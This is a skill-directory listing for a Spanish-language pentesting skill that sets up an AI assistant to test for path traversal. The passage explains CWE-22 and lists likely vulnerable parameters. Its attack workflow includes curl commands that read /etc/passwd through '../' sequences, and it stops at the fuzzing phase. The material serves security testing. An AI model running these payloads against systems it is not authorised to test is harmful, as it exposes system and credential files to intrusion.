← ClaudeAtlas

path-traversallisted

Usar esta skill siempre que el usuario quiera realizar pruebas de Path Traversal (también llamado Directory Traversal), incluyendo: detección de la vulnerabilidad, generación o selección de payloads de traversal, automatización de ataques con curl o ffuf, análisis de respuestas del servidor, identificación de archivos sensibles expuestos, y documentación de hallazgos para informes de pentest. Activar también cuando se mencionen: traversal de directorios, LFI (Local File Inclusion) vía path, escape de directorio raíz, acceso a /etc/passwd, rutas con "../", parámetros de fichero en URLs (page=, file=, path=, documento=, etc.), bypass de filtros de path, encoding de rutas (%2f, %252f, ..%2f), o fuzzing de rutas en auditorías web. Incluye payloads del repositorio hackingyseguridad/directoriotraversal.
hackingyseguridad/IA · ★ 1 · AI & Automation · score 74
Install: claude install-skill hackingyseguridad/IA
# Skill: Path Traversal / Directory Traversal ## Descripción de la vulnerabilidad Path Traversal (CWE-22, OWASP A01:2021) permite a un atacante acceder a archivos y directorios **fuera del directorio raíz del servidor web**, manipulando parámetros de URL o inputs que contienen rutas de ficheros. **Condición de explotabilidad**: el servidor concatena input del usuario con una ruta base sin sanitizar correctamente, p. ej.: ``` /var/www/html/uploads/ + ../../etc/passwd → /etc/passwd ``` **Severidad CVSS típica**: 7.5 – 9.8 (Critical) cuando expone ficheros del sistema. --- ## Workflow de ataque ### Fase 1 — Reconocimiento de parámetros vulnerables Identificar endpoints que acepten rutas o nombres de fichero: ``` https://target.com/download?file=report.pdf https://target.com/view?page=about https://target.com/img?src=/images/logo.png https://target.com/api/docs?document=manual.pdf ``` Parámetros más comunes a auditar: `file`, `page`, `path`, `doc`, `documento`, `template`, `src`, `img`, `view`, `resource`, `include`, `load`, `read`. ### Fase 2 — Prueba básica ```bash # Prueba directa con curl (--path-as-is preserva los ../ sin normalizar) curl --path-as-is -k -v "http://IP:80/../../../../../etc/passwd" # Con parámetro GET curl -sk "http://IP/download?file=../../../../etc/passwd" # Comprobar respuesta: si contiene "root:x:0:0" → VULNERABLE ``` ### Fase 3 — Fuzzing con lista de payloads Usar el wordlist del repositorio **hackingyseguridad/directoriotraversal**: